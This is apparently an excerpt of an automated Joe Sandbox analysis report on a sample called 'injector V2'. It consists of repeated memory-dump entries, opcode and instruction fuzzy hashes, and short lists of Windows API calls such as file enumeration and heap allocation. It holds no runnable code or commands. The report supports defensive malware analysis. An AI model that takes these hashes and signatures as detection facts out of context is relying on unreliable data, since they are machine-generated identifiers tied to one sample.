                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: F- $XvIL$jiX
                                                                                    • API String ID: 0-1826392768
                                                                                    • Opcode ID: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
                                                                                    • Instruction ID: bfb470c0d9b2d7af71fd3bb0bab76bcfcb6ef9fb122c2a40f053b395bff50c89
                                                                                    • Opcode Fuzzy Hash: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
                                                                                    • Instruction Fuzzy Hash: 03619E316517255BAE2C9A28B8E963C7ED1DF54361B7542FEF41F57AF0CA20AC8086C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: i.^$j.^
                                                                                    • API String ID: 0-1036069679
                                                                                    • Opcode ID: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
                                                                                    • Instruction ID: b39972b7eacc58a2c7a0aa23b5cb620b8f4f91b49de0b84d05968079cd545472
                                                                                    • Opcode Fuzzy Hash: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
                                                                                    • Instruction Fuzzy Hash: E6813A352047004F9A2C8A285CE863EB3C6EF95365F7957A9F613D76F0DF258D458283
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL$c79u
                                                                                    • API String ID: 0-4272471903
                                                                                    • Opcode ID: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
                                                                                    • Instruction ID: 1a3e91f8abad63049fc02d05efbee88f4c5d9fc0432a5e91a461f5f9759e86bf
                                                                                    • Opcode Fuzzy Hash: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
                                                                                    • Instruction Fuzzy Hash: 4E51AC356113219BDE2C9A24B9E9A3C7BE1DF58351B6502FDF80F57BB1D620EC848782
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B55D7D,?,?,00000008,?,?,00B5594F,00000000), ref: 00B5604F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
                                                                                    • Instruction ID: a78a5f1c1eec4997b017ffc70b4d25ac533b1601345ab5b459fa28ef433e5682
                                                                                    • Opcode Fuzzy Hash: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
                                                                                    • Instruction Fuzzy Hash: 9CB13931110A089FD725CF28C4DAB657BE0FF45366F6986D8E99ACF2A1C335D986CB40
                                                                                    APIs
                                                                                      • Part of subcall function 00B4EB3E: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B4CD28,00000001,00000364,00000000,00000002,000000FF,?,?,00B4E421,00B4DC80), ref: 00B4EB7F
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F915
                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4F954
                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4F987
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                    • String ID:
                                                                                    • API String ID: 2701053895-0
                                                                                    • Opcode ID: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
                                                                                    • Instruction ID: 95dd5effce4d5e6535595d2bdb47145ab5569a5eee812ae53b081e821185e276
                                                                                    • Opcode Fuzzy Hash: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
                                                                                    • Instruction Fuzzy Hash: 3651247590021AAFDF24AF389C85ABE77E9DF85358F1441EDF81997201EA348F41AB60
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B498EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
                                                                                    • Instruction ID: 608c1771c2aba19b4e6d17230fe177b54b4f8b61b8952222f9759d4b51fb992b
                                                                                    • Opcode Fuzzy Hash: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
                                                                                    • Instruction Fuzzy Hash: 69519AB1A103058FEB29CF59D8857AEBBF0FB48305F2485AAC419EB350E775DA40CB50
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000297D0,00B49125), ref: 00B496A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
                                                                                    • Instruction ID: c1a42fa247fc601252385e1b465b1fb9166aae621c8b56628788d68c9f290533
                                                                                    • Opcode Fuzzy Hash: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~bD`
                                                                                    • API String ID: 0-944831652
                                                                                    • Opcode ID: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
                                                                                    • Instruction ID: 38f40f9d415ec8283c6c7b9de9aef08868a2ac34076cdcea7b2a8dd1ebf7f01b
                                                                                    • Opcode Fuzzy Hash: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
                                                                                    • Instruction Fuzzy Hash: 0A715876305B005B8A2C8F2C5DD8279B3D5EB95321F794BEBE412CB2E1EB25CD469602
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~bD`
                                                                                    • API String ID: 0-944831652
                                                                                    • Opcode ID: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
                                                                                    • Instruction ID: 957d5bc68b16efaee0bfa2b872b6c5e6e52de3e2e0eed697aaa403380f1f823e
                                                                                    • Opcode Fuzzy Hash: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
                                                                                    • Instruction Fuzzy Hash: F95159B5300700AFDB289F2C9DD5B29B3E5EB99320F3846E6E915CB3A5E725CC45C642
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~bD`
                                                                                    • API String ID: 0-944831652
                                                                                    • Opcode ID: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
                                                                                    • Instruction ID: f065bd67f2716db30674caa2eb9561aa7706fb985f59f092215580660f998781
                                                                                    • Opcode Fuzzy Hash: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
                                                                                    • Instruction Fuzzy Hash: AC4116BA3007009FDB14DF389DD5B2973E6EB98320F3986A5E915CB3A5E735C845C642
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL
                                                                                    • API String ID: 0-558896452
                                                                                    • Opcode ID: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
                                                                                    • Instruction ID: 81e3498a37e1a7f131bc8bcbdf1a46ad9cacfdf16361ec8ffa0635cc4d6d51af
                                                                                    • Opcode Fuzzy Hash: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
                                                                                    • Instruction Fuzzy Hash: 36411774550214ABEE686F14F892A3C7BE1EF14315F5440E9F40E2B766D631AC848BC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL
                                                                                    • API String ID: 0-558896452
                                                                                    • Opcode ID: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
                                                                                    • Instruction ID: 50aad272a5704ea797ae2b0b1d9610d64ccdd7e36a810ffcc767f7947574ef57
                                                                                    • Opcode Fuzzy Hash: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
                                                                                    • Instruction Fuzzy Hash: 653139756502109FDE2CAF14B8E6A3C7BE1AF15315F6841EDF40F67AB2D631AC848782
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL
                                                                                    • API String ID: 0-558896452
                                                                                    • Opcode ID: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
                                                                                    • Instruction ID: a0e5232e26ff882e51c3306a825bf28221e26b698c55e9469c8198707c8d7b1d
                                                                                    • Opcode Fuzzy Hash: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
                                                                                    • Instruction Fuzzy Hash: 9A312670550221AAEE7C6B14B8E6A3C7BE1EF24351F6440EDF40F27A66D620AC8486C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL
                                                                                    • API String ID: 0-558896452
                                                                                    • Opcode ID: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
                                                                                    • Instruction ID: 0990fa742f22ff97d44b851b84429694efb19efcfe474c5d9a212dcbad976b9d
                                                                                    • Opcode Fuzzy Hash: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
                                                                                    • Instruction Fuzzy Hash: 06315970550220ABEE6C6B14B8E6A3C7BE1AF24311F6440EDF40F27B66D631AC8487C3
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
                                                                                    • Instruction ID: f7e8ae0ade9bea7654d54ed7757b15fcadf4285e9d6b62c58b30d3b7d127be95
                                                                                    • Opcode Fuzzy Hash: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
                                                                                    • Instruction Fuzzy Hash: 01A011302023008F83808F32AE083083AEAAA002C2B00C0A8A008C2220EE38A0008F00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
                                                                                    • Instruction ID: 9281044b62e77eb99db6f77444bb0b88021bd2472eef64766d044ee83c91b906
                                                                                    • Opcode Fuzzy Hash: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
                                                                                    • Instruction Fuzzy Hash: 38120939708B448BCE388E2894D453D73D2EB84715FB94AAEE867DB3A0DE20CD459753
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
                                                                                    • Instruction ID: 453ab81fef1f10d1088df85493cc90d88d2669f49e62b75fe4a6b9b28dcf8270
                                                                                    • Opcode Fuzzy Hash: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
                                                                                    • Instruction Fuzzy Hash: 27E1607A2143004F4D2CDE3869C472A77D2D7A5330B388AD2E822DB3E4DB75DF65A252
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
                                                                                    • Instruction ID: bf57f3e73b624efeaae79f84d2a4646813c5f9c74dee0356c0fd97192130efae
                                                                                    • Opcode Fuzzy Hash: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
                                                                                    • Instruction Fuzzy Hash: 66D1283975A3108F9D289638A5D522D33C28B96330B388BE5E521CB3E5EB65DF45E243
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
